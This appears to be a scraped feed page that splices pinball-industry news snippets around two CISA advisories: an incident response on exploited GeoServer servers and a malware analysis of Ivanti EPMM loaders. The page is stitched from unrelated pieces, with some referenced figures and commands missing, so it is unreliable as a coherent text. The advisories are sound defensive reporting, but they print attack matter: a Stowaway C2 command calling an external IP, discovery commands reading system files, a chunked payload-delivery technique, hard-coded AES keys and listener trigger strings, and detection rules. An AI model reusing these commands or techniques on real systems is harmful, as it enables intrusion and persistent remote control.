Business Insider//Abby Tang and Charlies Floyd. October 28, 2025 Once banned as a form of gambling and later nearly wiped out by video games, pinball has survived nearly a century of moral panic, cultural change, and technological upheaval. Now, in the era of arcade bars and basements, the classic game has earned an extra life. […]
The Pinball Expo Hall of Fame and the U.K. Pinball Hall of Fame jointly inducted Sir Elton John at the recent Pinball Expo. The award was accepted by Jack Guarnieri of Jersey Jack Pinball, the makers of Elton John Pinball, reported U.K. pinball aficionado Gary Flower. Elton John has famously been portrayed on two pinball models […]
CISA began incident response efforts at a U.S. federal civilian executive branch (FCEB) agency following the detection of potential malicious activity identified through security alerts generated by the agency’s endpoint detection and response (EDR) tool. CISA identified three lessons learned from the engagement that illuminate how to effectively mitigate risk, prepare for, and respond to incidents: vulnerabilities were not promptly remediated, the agency did not test or exercise their incident response plan (IRP), and EDR alerts were not continuously reviewed.
Key Actions
Prevent compromise by prioritizing the patching of critical vulnerabilities in public-facing systems and known exploited vulnerabilities.
Prepare for incidents by maintaining, practicing, and updating incident response plans.
Prepare for incidents by implementing comprehensive and verbose logging and aggregate logs in a centralized out-of-band location.
Indicators of Compromise
For a downloadable copy of indicators of compromise, see:
The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Cybersecurity Advisory to highlight lessons learned from an incident response engagement CISA conducted at a U.S. federal civilian executive branch (FCEB) agency. CISA is publicizing this advisory to reinforce the importance of prompt patching, as well as preparing for incidents by practicing incident response plans and by implementing logging and aggregating logs in a centralized out-of-band location. CISA is also raising awareness about the tactics, techniques, and procedures (TTPs) employed by these cyber threat actors to help organizations safeguard against similar exploits.
CISA began incident response efforts at an FCEB agency after the agency identified potential malicious activity through security alerts generated by the agency’s endpoint detection and response (EDR) tool. CISA discovered cyber threat actors compromised the agency by exploiting CVE-2024-36401 in a GeoServer about three weeks prior to the EDR alerts. Over the three-week period, the cyber threat actors gained separate initial access to a second GeoServer via the same vulnerability and moved laterally to two other servers.
Leveraging insights CISA gleaned from the organization’s security posture and response, CISA is sharing lessons learned for organizations to mitigate similar compromises (see Lessons Learned for more details):
Vulnerabilities were not promptly remediated.
The cyber threat actors exploited CVE-2024-36401 for initial access on two GeoServers.
The vulnerability was disclosed 11 days prior to the cyber threat actors accessing the first GeoServer and 25 days prior to them accessing the second GeoServer.
The agency did not test or exercise their incident response plan (IRP), nor did their IRP enable them to promptly engage third parties and grant third parties access to necessary resources.
This delayed certain elements of CISA’s response as the IRP did not have procedures for involving third-party assistance or for granting third-party access to their security tools.
EDR alerts were not continuously reviewed, and some public-facing systems lacked endpoint protection.
The activity remained undetected for three weeks; the agency missed an opportunity to detect this activity earlier as they did not observe an alert from a GeoServer and the Web Server did not have endpoint protection.
These lessons highlight strategies to effectively mitigate risk, enhance preparedness, and respond to incidents with greater efficiency. CISA encourages all organizations to consider the lessons learned and apply the associated recommendations in the Mitigations section of this advisory to improve their security posture.
This advisory also provides the cyber threat actors’ TTPs and indicators of compromise (IOCs). For a downloadable copy of IOCs, see:
CISA responded to a suspected compromise of a large FCEB agency after the agency’s security operations center (SOC) observed multiple endpoint security alerts.
During the incident response, CISA discovered that cyber threat actors gained access to the agency’s network on July 11, 2024, by exploiting GeoServer vulnerability CVE 2024-36401 [CWE-95: “Eval Injection”] on a public-facing GeoServer (GeoServer 1). This critical vulnerability, disclosed June 30, 2024, allows unauthenticated users to gain remote code execution (RCE) on affected GeoServer versions [1]. The cyber threat actors used this vulnerability to download open source tools and scripts and establish persistence in the agency’s network. (CISA added this vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog on July 15, 2024.)
After gaining initial access to GeoServer 1, the cyber threat actors gained separate initial access to a second GeoServer (GeoServer 2) on July 24, 2024, by exploiting the same vulnerability. They moved laterally from GeoServer 1 to a web server (Web Server) and then a Structured Query Language (SQL) server. On each server, they uploaded (or attempted to upload) web shells such as China Chopper, along with scripts designed for remote access, persistence, command execution, and privilege escalation. The cyber threat actors also used living off the land (LOTL) techniques.
See Figure 1 for an overview of the cyber threat actors’ activity and the following sections for detailed threat actors TTPs.
The cyber threat actors identified CVE-2024-36401 in the organization’s public-facing GeoServer using Burp Suite Burp Scanner [T1595.002]. CISA detected this scanning activity by analyzing web logs and identifying signatures associated with the tool. Specifically, CISA observed domains linked to Burp Collaborator—a component of Burp Suite used for vulnerability detection—originating from the same IP address the cyber threat actors later used to exploit the GeoServer vulnerability for initial access.
Resource Development
The cyber threat actors used publicly available tools to conduct their malicious operations. In one instance, they gained remote access to the organization’s network and leveraged a commercially available virtual private server (VPS) from a cloud infrastructure provider [T1583.003].
Initial Access
To gain initial access to GeoServer 1 and GeoServer 2, the cyber threat actors exploited CVE 2024-36401 [T1190]. They leveraged this vulnerability to gain RCE by performing “eval injection,” a type of code injection that allows an untrusted user’s input to be evaluated as code. The cyber threat actors likely attempted to load a JavaScript extension to gain webserver information as an Apache wicket on GeoServer 1. However, their efforts were likely unsuccessful, as CISA observed attempts to access the .js file returning 404 responses in the web logs, indicating that the server could not find the requested URL.
Persistence
The cyber threat actors primarily used web shells [T1505.003] on internet-facing hosts, along with cron jobs (scheduled commands that run automatically at specified times) [T1053.003], and valid accounts [T1078] for persistence. CISA also identified the creation of accounts—although these accounts were later deleted—with no evidence indicating further use.
Privilege Escalation
The cyber threat actors attempted to escalate privileges with the publicly available dirtycow tool [2], which can be used to exploit CVE-2016-5195 [CWE-362: “Race Condition”] [T1068]. After compromising web service accounts, they escalated their local privileges to transition away from these service accounts (it is unknown how they escalated privileges).
Note: CVE-2016-5195 affects Linux kernel 2.x through 4.x before 4.8.3 and allows users to escalate privileges. CISA added this CVE to its KEV Catalog on March 3, 2022.
Defense Evasion
To evade detection, the cyber threat actors employed indirect command execution via .php web shells and xp_cmdshell [T1202] and abused Background Intelligence Transfer Service (BITS) jobs [T1197]. CISA also observed files on GeoServer 1 named RinqQ.exe and RingQ.rar, which likely refer to a publicly available defense evasion tool called RingQ [3], that the cyber threat actors staged for potential use.
Note: CISA could not recover most of the files on the host to confirm their contents.
Credential Access
Once inside the organization’s network, the cyber threat actors primarily relied on brute force techniques [T1110] to obtain passwords for lateral movement and privilege escalation. They also accessed service accounts by exploiting their associated services.
Discovery
After gaining initial access, the cyber threat actors conducted discovery to facilitate lateral movement. They performed ping sweeps of hosts within specific subnets [T1018] and downloaded the fscan tool [4] to scan the organization’s network. CISA identified the use of the fscan tool by analyzing evidence of its output found on disk. (Note: fscan is publicly available on GitHub and is capable of port scanning, fingerprinting, and web vulnerability detection—among other functions.) Between July 15 and 31, 2024, the cyber threat actors conducted extensive network and vulnerability scanning using fscan and linux-exploit-suggester2.pl. CISA’s host forensics analysts uncovered this activity by reviewing remnants the cyber threat actors left on disk.
GeoServer 1
The cyber threat actors leveraged CVE-2024-36401 to execute the following host discovery commands on GeoServer 1:
The cyber threat actors then used curl commands to download a shell script named mm.sh (which they renamed to aa.sh) and a zip file named aaa.zip to the /tmp/ directory.
Subsequently, they enumerated the internal network from GeoServer 1, identifying Secure Shell (SSH) listeners, File Transfer Protocol (FTP) servers, file servers, and web servers [T1046] by using the fscan tool. (Note: CISA observed endpoint logs that showed the cyber threat actors uploaded fscan to the compromised host and ran it against internal systems.) The actors then attempted to brute force login credentials for the exploited web services to gain remote access, achieve RCE, or move laterally.
The cyber threat actors also conducted ping sweeps of several hosts within the organization’s internal subnets using fscan. Their use of the -nobr and -nopoc flags for fscan indicated that this scan excluded brute forcing or vulnerability scanning, respectively.
SQL Server
CISA observed the following discovery commands on the organization’s SQL server:
type C:WindowsSystem32inetsrvconfigapplicationHost.config
dir c:ifwappsTier1Utilities
netstat -ano
curl
net user
tasklist
GeoServer 2
Based on images CISA received of GeoServer 2, CISA observed the bash history of a user that showed the use of Burp Collaborator to execute encoded host and network discovery commands.
Lateral Movement
In one instance, the cyber threat actors moved laterally from the Web Server to the SQL Server by enabling xp_cmdshell for RCE on GeoServer 1.
Command and Control
The cyber threat actors used PowerShell [T1059.001] and bitsadmin getfile to download payloads [T1105].
They used Stowaway [5], a publicly available multi-level proxy tool, to establish C2 [T1090]. Stowaway enabled the cyber threat actors to bypass the organization’s intranet restrictions and access internal network resources by forwarding traffic from their C2 server through the Web Server. They wrote Stowaway to disk using a tomcat service account.
The actors then executed Stowaway via /var/tmp/agent -c 45.32.22[.]62:4441 -s f86bc7ff68aff3ad –up http –reconnect 10.
To test their level of access, the cyber threat actors performed a ping sweep of multiple hosts in a particular subnet of the organization’s network. Next, the cyber threat actors downloaded a modified version of Stowaway using a curl command, successfully establishing an outbound connection with their C2 server using HTTP over TCP/4441.
On July 14, 2024, the cyber threat actors executed /tmp/mm.sh on the Web Server followed by an encoded command to execute Stowaway. The contents of this file could not be recovered. Additionally, they used Stowaway to establish a second C2 connection over TCP/50012, likely serving as a backup C2 channel.
CISA discovered evidence of various files hosted on the C2 server, including numerous publicly available tools and scripts:
The cyber threat actors remained undetected in the organization’s environment for three weeks before the organization’s SOC identified the compromise using their EDR tool. On July 31, 2024, their EDR tool identified a 1.txt file uploaded as suspected malware on the SQL Server. The SOC responded to additional alerts when the cyber threat actors transferred 1.txt to the SQL Server through bitsadmin after attempting other LOTL techniques, such as leveraging PowerShell and certutil. The alerts generated by this activity on the SQL server prompted the SOC to contain the server, initiate an investigation, request assistance from CISA, and uncover malicious activity on GeoServer 1.
CISA is sharing the following lessons learned based on what CISA learned about the organization’s security posture through incident detection and response activities.
Vulnerabilities were not promptly remediated.
The cyber threat actors exploited CVE-2024-36401 for initial access on two GeoServers.
The vulnerability was disclosed June 30, 2024, and the cyber threat actors exploited it for initial access to GeoServer 1 on July 11, 2024.
The vulnerability was added to CISA’s KEV Catalog on July 15, 2024, and by July 24, 2024, the vulnerability was not patched when the cyber threat actors exploited it for access to GeoServer 2.
Note: FCEB agencies are required to remediate vulnerabilities in CISA’s KEV Catalog within prescribed timeframes under Binding Operational Directive (BOD) 22-01. July 24, 2024, was within the KEV-required patching window for this CVE. However, CISA encourages FCEB agencies and critical infrastructure organizations to address KEV catalog vulnerabilities immediately as part of their vulnerability management plan.
The agency did not test or exercise their IRP, nor did their IRP enable them to promptly engage third parties and grant third parties’ access to necessary resources.
On Aug. 1, 2024, upon discovering the endpoint alerts, the agency conducted remote triage of affected systems and used their EDR tool to contain the intrusion.
After containment, the agency engaged CISA to investigate potential threat actor persistence in their environment.
Their IRP did not have procedures for bringing in third parties for assistance, which hampered CISA’s efforts to respond to the incident quickly and efficiently.
The agency could not provide CISA remote access to their security information and event management (SIEM) tool, which initially kept CISA from reviewing all available logs, hindering CISA’s analysis.
The agency had to go through their change control board process before CISA could deploy their EDR agents.
The agency could have proactively identified these roadblocks by testing their IRP, such as via a tabletop exercise, but had not tested their plan for a long period.
EDR alerts were not continuously reviewed, and some public-facing systems lacked endpoint protection.
The activity remained undetected for three weeks; the agency missed an opportunity to detect this activity on July 15, 2024, as they did not observe an alert from GeoServer 1 where the EDR detected the Stowaway tool.
The Web Server lacked endpoint protection.
Indicators of Compromise
See Table 1 for IOCs associated with this activity.
Disclaimer: The IP addresses in this advisory were observed in August 2024, and some may be associated with legitimate activity. Organizations are encouraged to investigate the activity around these IP addresses prior to taking action, such as blocking. Activity should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors.
The cyber threat actors used cat /etc/redhat-release and cat /etc/os-release commands to get Red Hat Enterprise Linux (RHEL) and Linux operating system information.
CISA recommends organizations implement the mitigations below to improve cybersecurity posture based on lessons learned from the engagement. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
Establish a vulnerability management plan that includes procedures for prioritization and emergency patching.
Prioritize patching of known exploited vulnerabilities listed in the KEV catalog.
CISA urges organizations to address KEV catalog vulnerabilities immediately.
Prioritize patching vulnerabilities in high-risk systems, including public facing systems as they are attractive targets for threat actors.
Ensure high-risk systems are identified and prioritized for rapid patching by implementing asset management practices and conducting an asset inventory.
Continuously discover and validate internet-facing assets through automated asset management and scanning (e.g., attack surface management tools, vulnerability scanners).
Consider using a configuration management database (CMDB) with discovery and vulnerability tools to enrich asset context and support automated prioritization.
Form a dedicated team responsible for assessing and implementing emergency patches, this team should include representatives from IT, security, and relevant business units.
Maintain, practice, and update cybersecurity IRPs [CPG 2.S, 5.A].
Prepare a written IRP policy and IRP with senior leadership support.
The policy should identify purpose and objectives, what constitutes an incident, prioritization or severity ratings of incidents, clear escalation procedures, IR personnel, and plans for notification, interaction and information sharing with media, law enforcement, and partners.
The IRP should identify:
Key personnel with knowledge of the network
Key resources and courses of action (COAs) for containment and eradication in the event of compromise.
Procedures for granting third parties prompt access to networks and security tools.
This should include processes for expediating deployment of EDR and other security tools through change control boards (CCBs).
The IRP should include procedures for establishing out-of-band communications systems and accounts in case primary systems are compromised or not available (such as with ransomware incidents).
Periodically test the IRP under real-world conditions, such as via purple team engagements and tabletop exercises.
During the test, include engagement with third party incident responders and external EDR agents and other tools.
Following the test, update the IRP as necessary.
See CISA’s Tabletop Exercise Packages for resources designed to assist organizations with conducting their own exercises.
Implement comprehensive (i.e., large coverage) and verbose (i.e., detailed) logging and aggregate logs in an out-of-band, centralized location.
Prepare SOCs with sufficient resources to monitor collected logs and responses to malicious cyber threat activity.
Consider using a SIEM solution for log aggregation and management.
Identify, alert on, and investigate abnormal network activity (as threat actor activity generates unusual network traffic across all phases of the attack chain).
Abnormal activity to look for includes:
Running scans to discover other network connected devices.
Running commands to list, add, or alter administrator accounts.
Using PowerShell to download and execute remote programs.
Running scripts not usually seen on a network.
For additional information, see joint guide Identifying and Mitigating Living off the Land Techniques, which provides prioritized detection recommendations that enable behavior analytics, anomaly detection, and proactive hunting.
In addition to the above, CISA recommends organizations implement the following mitigations based on threat actor activity:
Implement allowlisting for applications, scripts, and network traffic to prevent unauthorized execution and access.
Validate Security Controls
In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK Matrix for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
Select an ATT&CK technique described in this advisory (see Table 3 through Table 11).
Align your security technologies against the technique.
Test your technologies against the technique.
Analyze your detection and prevention technologies’ performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program, including people, processes, and technologies, based on the data generated by this process.
CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
The information in this report is being provided “as is” for informational purposes only. CISA does not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA.
Version History
September 23, 2025: Initial version.
Apendix: Key Events Timeline
Date/Time
Relevant Host
Event
July 1, 2024
n/a
CVE-2024-36401 published.
July 11, 2024
GeoServer 1
Initial Access to GeoServer 1.
July 15, 2024
n/a
CVE-2024-36401 added to CISA’s Known Exploited Vulnerabilities Catalog.
July 15, 2024
GeoServer 1
EDR detects Stowaway tool on GeoServer 1.
July 24, 2024
GeoServer 2
Initial Access to GeoServer 2.
July 31, 2024
Web Server
Initial Access to Web Server.
July 31, 2024
SQL Server
Initial Access to SQL Server.
Aug. 1, 2024
SQL Server, GeoServer 1
Organization observes SQL Alert and contains SQL Server and GeoServer 1.
Aug. 1, 2024
n/a
The impacted organization requested assistance from CISA.
Aug. 5, 2024
n/a
CISA began forensic artifact analysis.
Aug. 6, 2024
GeoServer 2
Last observed threat actors’ activity—discovery commands on GeoServer 2.
The Cybersecurity and Infrastructure Security Agency (CISA) obtained two sets of malware from an organization compromised by cyber threat actors exploiting CVE-2025-4427 and CVE-2025-4428 in Ivanti Endpoint Manager Mobile (Ivanti EPMM). Each set contains loaders for malicious listeners that enable cyber threat actors to run arbitrary code on the compromised server.
Affected Products
Ivanti EPMM, versions 11.12.0.4 and prior, 12.3.0.1 and prior, 12.4.0.1 and prior, and 12.5.0.0 and prior. (Ivanti provided a patch and disclosed the vulnerabilities on May 13, 2025.)
Key Actions
Detect activity by using the indicators of compromise (IOCs) and detection signatures to identify malware samples.
Prevent compromise by upgrading Ivanti EPMM versions to the latest version as soon as possible.
Prevent compromise by treating mobile device management (MDM) systems as high-value assets (HVAs) with additional restrictions and monitoring.
Indicators of Compromise
For a downloadable copy of IOCs associated with this malware, see: MAR-251126.r1.v1.CLEAR.
Detection
This malware analysis report includes YARA and SIGMA rules.
For a downloadable copy of the SIGMA rule associated with this malware, see: AR25-260A/B SIGMA YAML.
Intended Audience
Organizations: All organizations with on-premises Ivanti EPMM systems.
The Cybersecurity and Infrastructure Security Agency (CISA) obtained two sets of malware, five files in total, from an organization where cyber threat actors exploited CVE-2025-4427 [CWE-288: Authentication Bypass Using an Alternate Path or Channel] and CVE-2025-4428 [CWE-‘Code Injection’] in Ivanti Endpoint Manager Mobile (Ivanti EPMM) deployments for initial access.
Note: Ivanti provided a patch and disclosed the vulnerabilities on May 13, 2025. CISA added both vulnerabilities to its Known Exploited Vulnerabilities Catalog on May 19, 2025.
Around May 15, 2025, following publication of a proof of concept, the cyber threat actors gained access to the server running EPMM by chaining these vulnerabilities. The cyber threat actors targeted the /mifs/rs/api/v2/ endpoint with HTTP GET requests and used the ?format= parameter to send malicious remote commands. The commands enabled the threat actors to collect system information, download malicious files, list the root directory, map the network, execute scripts to create a heapdump, and dump Lightweight Directory Access Protocol (LDAP) credentials.
CISA analyzed two sets of malicious files the cyber threat actors wrote to the /tmp directory. Each set of malware enabled persistence by allowing the cyber threat actors to inject and run arbitrary code on the compromised server.
CISA encourages organizations to use the indicators of compromise (IOCs) and detection signatures in this Malware Analysis Report to identify malware samples. If identified, follow the guidance in the Incident Response section of this Malware Analysis Report. Additionally, organizations should ensure they are running the latest version of Ivanti EPMM as soon as possible.
Set 1 consists of the following malicious files: web-install.jar, ReflectUtil.class, and SecurityHandlerWanListener.class.
Set 2 consists of the following malicious files: web-install.jar and WebAndroidAppInstaller.class.
Note: To distinguish the set 1 malware, named web-install.jar, from the set 2 malware with the same name, hereafter this Malware Analysis Report will refer to:
Set 1’s web-install.jar as Loader 1.
Set 2’s web-install.jar as Loader 2.
Each set contains a loader and malicious listener that enables cyber threat actors to inject and run arbitrary code on the compromised server.
Set 1 works together in the following ways:
Loader 1 contains and loads ReflectUtil.class.
ReflectUtil.class injects and manages SecurityHandlerWanListener in Apache Tomcat.
SecurityHandlerWanListener.class intercepts specific HTTP requests and processes them to decode and decrypt payloads, which create a new class that cyber threat actors can execute to run arbitrary code.
Set 2 works together in the following ways:
Loader 2 contains and loads WebAndroidAppInstaller.class at runtime.
WebAndroidAppInstaller.class intercepts and processes specific HTTP requests, retrieves and decrypts password parameters from the request, defines and loads a new malicious class, encrypts and encodes the new class output, and generates a response with the encrypted output.
Malware Delivery
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 17. See Appendix A: MITRE ATT&CK Techniques for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.
The cyber threat actors delivered this malware in segments, splitting Loader 1 and 2 into multiple Base64-encoded segments [T1027.004]. They delivered each segment via separate HTTP GET requests and then used Java Expression Language (EL) injection to write each chunk and append them together using the append mode (via the true parameter).
For each loader, the actors’ first GET request created the file and wrote chunk 1. Their subsequent requests appended chunks to the existing file. Below is an example of the actors’ GET request.
This technique is used for defense evasion—it enables the malware to evade signature-based detection and size limitations as it is transferred to the system. Holistically, this technique combines chunked encoding for evasion and file append operations for reconstruction.
Malware Metadata
Set 1
See Table 1 through Table 3 for metadata of the analyzed malware.
This set of malware contains a loader, a manager, and a malicious listener.
Loader 1
Loader 1 is a Java Archive (JAR) file that contains [T1027.009] and loads the compiled Java class file ReflectUtil.class at runtime. Loader 1 masquerades ReflectUtil.class as part of the org.apache.http package [T1036]. See Figure 1 for ReflectUtil.class’s hierarchal file path.
Figure 1. Loader 1 Internal Structure
ReflectUtil.class Manager
ReflectUtil.class manipulates Java objects to inject and manage the malicious listener SecurityHandlerWanListener in Apache Tomcat (which was running on the same compromised server). When executed, the file:
Bypasses Java Development Kit (JDK) module restrictions.
Iterates objects and their contexts.
Attempts to load SecurityHandlerWanListener class in the JUnit environment or framework by using getClassName() to return the hard-coded string org.junit.SecurityHandlerWanListener [T1620].
If SecurityHandlerWanListener class is not loaded because it is not found when ReflectUtil.class first executes, ReflectUtil.class handles the error by using a Base64 string catch block (Figure 2) to Base64 decode, gzip decompress, and load the class SecurityHandlerWanListener.
Figure 2. getBase64String() to Base64 Decode, gzip Decompress, and Load the Class SecurityHandlerWanListener
The Base64 string:
Returns the Base64-encoded and gzip-compressed bytecode of class SecurityHandlerWanListener.
Decodes and decompresses [T1140] the class bytecode (see Figure 3) in one of two ways:
It first uses sun.misc.BASE64Decoder to call decodeBuffer.
If the first attempt fails, it uses java.util.Base64 to call getDecoder.
Figure 3. Java Code Snippet for Decoding a Base64 String
Invokes the defineClass method of ClassLoader to load the class from the decompressed bytecode.
Once the class SecurityHandlerWanListener is loaded, ReflectUtil.class:
Creates a new instance of the class and returns it as a new listener.
Retrieves the current list of listeners, adds the new listener to this list, and updates the application’s listener list.
Checks if evilClassName has already been injected into the application’s event listener list to avoid multiple injections or to confirm a previous injection. (CISA has no additional information on the listener evilClassName.)
SecurityHandlerWanListener.class
This compiled Java class file is a malicious listener that intercepts specific HTTP requests and processes them to decode and decrypt payloads, which dynamically create and execute a new class.
The file uses ClassLoader to set up a custom servlet listener that intercepts HTTP requests [T1071.001] based on String Pass, Header Name, and Header Values. Specifically, when a new HTTP request is received, the servlet listener checks if the request contains the string pass 7c6a8867d728c3bb, Header Name Referer, and Header Value https://www[.]live.com.
If the fields match, the file creates a HashMap to store the request, response, and session objects. The file also stores the key 7c6a8867d728c3bb in the session.
The file then retrieves, decodes, and decrypts the Base64-encoded payload:
The file retrieves the payload by reading a line from request’s input stream (request.getReader().readLine()).
The file decodes the line using Base64.
The file decrypts the decoded data using Advanced Encryption Standard (AES) cipher object with the stored key.
The file passes the decrypted data to a method named g, which defines and creates a new Java class file. Cyber threat actors can execute the class on the device to run arbitrary code.
Potential impact: This listener could allow cyber threat actors to:
Inject and execute arbitrary code on the server, enabling follow-on activity and persistence.
Exfiltrate data by intercepting and processing HTTP requests.
See Figure 4 for the relevant listener code snippet.
Figure 4. Java Code Snippet
Set 2
This set of malware contains a loader and a malicious listener.
Loader 2
This JAR file contains and loads the compiled Java class file WebAndroidAppInstaller.class at runtime.
The JAR file masquerades the class file as part of the com.mobileiron.service package. See Figure 5 for WebAndroidAppInstaller.class’s hierarchal file path.
This compiled Java class file is a malicious listener that intercepts and processes specific HTTP requests, retrieves and decrypts password parameters from the request, defines and loads a new malicious class, encrypts and encodes the new class output, and generates a response with the encrypted output.
The listener first retrieves request and response objects from a Java ServletContext. Then, the file checks the request’s Content-Type to ensure it is not null and contains the string application/x-www-form-urlencoded.
If these conditions are met, the file retrieves a password parameter from the request. If the data is not null and has a length greater than zero, the password parameter value is Base64 decoded and decrypted using an AES algorithm with the hard-coded key 3c6e0b8a9c15224a [T1573.001].
If the decrypted data is not empty, the decrypted data defines and implements a new class. The file AES encrypts the new class output using the same hard-coded key, 3c6e0b8a9c15224a, and then Base64 encodes it [T1027.013].
The file then generates a Message Digest Algorithm 5 (MD5) hash of the data stored in the password parameter (from the initial HTTP request) and hard-coded key and checks if the hash value was stored in newly allocated byte array ByteArrayOutputStream. The file creates a PrintWriter object to generate a response containing the first 16 characters of the computed MD5 hash value, followed by the Base64-encoded and AES-encrypted output of the new loaded class and the remaining part of the MD5 hash value.
Potential impact. This listener could allow cyber threat actors to:
Inject and execute arbitrary code on the server, enabling follow-on activity and persistence.
Exfiltrate data by receiving response and execution results.
See Figure 6 for the applicable Java code Snippet.
Figure 6. WebAndroidAppInstaller.class Java Code
Detection
Yara Rules
Deploy the CISA-created YARA rules in Table 6 to detect malicious activity.
Table 6. YARA Rules
Loader 1
rule CISA_251126_01 : trojan hides_artifacts
{
meta:
author = “CISA Code & Media Analysis”
incident = “251126”
date = “2025-07-23”
last_modified = “20250724_1615”
actor = “n/a”
family = “n/a”
capabilities = “hides-artifacts”
malware_type = “trojan”
tool_type = “unknown”
description = “Detects malicious jar filter samples”
Deploy the CISA-created SIGMA rule in Table 7 to detect malicious activity.
Table 7. SIGMA Rule
Loader Malware for Ivanti Mobile Management Systems
## CISA Code & Media Analysis ##
############ README ###############
## Edit rules and queries as needed for your hunt and based on your environment.
## Ensure your EDR/SIEM instance has enough memory to run these AND/OR condition-based queries. May take longer to run than conventional Sigma rule query.
## Do not edit “logsource-product:” unless you are editing this rule to meet specific logsources/fields and know your environment.
## TLP CLEAR may convert rules using online converter of choice.
###################################
title: Detects Artifacts Based on MAR-251126, Ivanti EPMM CVE-2025-4427 and CVE-2025-4428
incident: 251126
tlp: CLEAR
id: 83df757f-54e7-44a0-be21-ae2306ca3240
status: test
description: Detects abused URL paths and suspicious commands used by Threat Actors on Ivanti Endpoint Manger Mobile (EPMM). Based on MAR-251126 as well as Unauthenticated Remote Code Execution Vulnerabilities CVE-2025-4427 and CVE-2025-4428.
condition: keywords and keywords_1 and keywords_2 or keywords and keywords_1 and keywords_3 or keywords_3 and keywords_4 or keywords_5
falsepositives:
– Rate of FP low-moderate with some strings.
– Use this rule in an infected environment/logs.
– Analyst may need to make adjustments to the query as required.
level: high
Incident Response
If this or similar malware is detected, CISA recommends that organizations:
Quarantine or take offline potentially affected hosts.
Collect and review artifacts, such as running processes/services, unusual authentications, and recent network connections.
Capture a full forensic disk image of the affected host for sharing with CISA.
If initial investigation (Step 2) finds the threat actor’s access was limited (e.g., they did not move laterally or elevate privileges), provision new account credentials. If the investigation finds the threat actor had broader access or potentially moved laterally, follow your organization’s incident response plans to initiate threat hunting, containment, and eviction measures.
Use CISA’s Malware Analysis Submission Form to submit a file containing the malicious code. Include the CISA-provided Incident ID number (obtained from reporting the compromise) in the Open Incident ID field.
Reimage compromised hosts.
Apply recommendations from the Mitigations section to harden the systems.
Mitigations
CISA recommends organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of the threat actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s CPGs webpage for more information on the CPGs, including additional recommended baseline protections.
Upgrade Ivanti EPMM versions to the latest version as soon as possible.
Treat mobile device management (MDM) systems as high-value assets (HVAs) with additional restrictions and monitoring. MDM systems provide elevated access to thousands of hosts and should be treated as HVAs with additional restrictions and monitoring.
Follow best cybersecurity practices in production and enterprise environments, including mandating phishing-resistant multifactor authentication (MFA) for all staff and services. For additional best practices, see CISA’s Cross-Sector Cybersecurity Performance Goals (CPGs).
Disclaimer
CISA does not endorse any commercial entity, product, company, or service, including any entities, products, companies, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA.
Version History
September 18, 2025: Initial version.
Appendix A: MITRE ATT&CK Techniques
See Table 8 and Table 9 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Table 8. Defense Evasion
Technique Title
ID
Use
Obfuscated Files or Information: Compile After Delivery
The cyber threat actors delivered malware in segments, splitting it into multiple Base64-encoded segments. The actors used Java EL injection to write each chunk and append them together using the append mode (via the true parameter).
Obfuscated Files or Information: Embedded Payloads
Jack Guarnieri, known throughout the business as Jersey Jack, is celebrating 50 years in coin-op today. (You may already know that if you’ve read his recent RePlay column, which he’s been writing since October 2004.) Jack’s journey began as a pinball mechanic, repairing electromechanical machines in college game rooms in the New York City area. “I was […]
Collectors are hoarding the arcade mainstays, which can boast prices that rival artwork and watches. Ricky Jordan’s three-year-old son loves Disney. Even Jordan, 42, is a self-described “Disney head.” So, this year, he decided to snag a Toy Story-branded game for their house. It cost a tad more than a Buzz Lightyear figurine. While rinky-dink arcade […]
